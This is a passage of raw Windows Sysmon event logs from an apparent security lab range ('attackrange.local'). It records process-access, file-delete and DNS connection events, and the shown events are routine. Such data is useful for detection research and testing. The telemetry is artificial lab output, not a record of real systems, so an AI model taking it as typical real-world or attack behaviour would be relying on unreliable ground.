12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B6-6086-6501-00000000BB01}4240C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292909Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B6-6086-6501-00000000BB01}4240C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292908Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292907Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292906Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292905Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292904Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292903Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292902Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292901Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292900Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292899Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292898Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292897Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292896Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292895Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292894Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292893Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292892Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292891Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292890Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292889Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292888Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292887Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292886Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292885Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292884Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292883Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.760{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292882Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.544{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E0C2B29470353506C02501D183C87AE5,SHA256=76BDB0D501CBFBE2C3ED75B8980A78BF13D1BC92135EFF70168BD141E159FB2C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292881Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.475{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=0DE0F3897743F3AF0928F1B72C26E6F4,SHA256=382CDE4F213DB74B803E0D71EBDFE840A2323897E8FEFAA99A566514727ED58F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292880Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.406{BEA10069-02A1-6088-112A-00000000BB01}65686164C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdd53|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdcf3|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdc66|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bd60d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Program Files\Microsoft Office\Root\Office16\wwlib.dll+3b117|C:\Program Files\Microsoft Office\Root\Office16\wwlib.dll+1f2312|C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE+1143|C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE+1492|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292879Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.406{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4BC1D81926D5E22FA8FEFA441337A07,SHA256=BA07B9BA2748DC88202DEDC34990A07F901BCEC6F3D5A258E04AB94B64870F7F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292878Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:09.406{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441405Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:05.767{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal58956- 354300x8000000000000000441404Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 